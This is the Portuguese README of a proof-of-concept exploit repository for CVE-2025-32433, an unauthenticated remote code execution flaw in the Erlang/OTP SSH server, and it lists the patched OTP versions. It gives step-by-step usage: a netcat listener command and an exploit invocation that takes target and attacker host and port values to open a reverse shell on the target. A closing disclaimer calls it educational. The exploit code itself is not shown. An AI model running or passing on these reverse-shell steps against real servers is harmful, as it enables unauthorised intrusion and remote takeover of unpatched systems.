
PoC mostrando execução remota de código não autenticada no servidor SSH Erlang/OTP. Ao explorar uma falha no manuseio de mensagens do protocolo SSH, um atacante pode executar comandos arbitrários no alvo sem credenciais válidas.
PoC demonstrando execução remota de código não autenticada no servidor SSH do Erlang/OTP.
Ao explorar uma falha no tratamento de mensagens do protocolo SSH, um atacante consegue executar comandos arbitrários no alvo sem credenciais válidas.
Este problema foi corrigido nas versões OTP-27.3.3, OTP-26.2.5.11 e OTP-25.3.2.20.
Configuração do Listener:
nc -lvnp 1234
Executar o Exploit:
python3 CVE-2025-32433-dbs --rhost <IP_ALVO> --rport <PORTA_ALVO> --lhost <IP_ATACANTE> --lport <PORTA_ATACANTE>
--rhost : IP do alvo--rport : Porta SSH do alvo--lhost : Seu IP para a shell reversa--lport : Porta do seu listener

Este repositório tem finalidade exclusivamente educacional. Não utilize este exploit contra sistemas que não sejam seus ou para os quais não tenha permissão explícita para testar. O uso indevido pode ser ilegal e é estritamente proibido.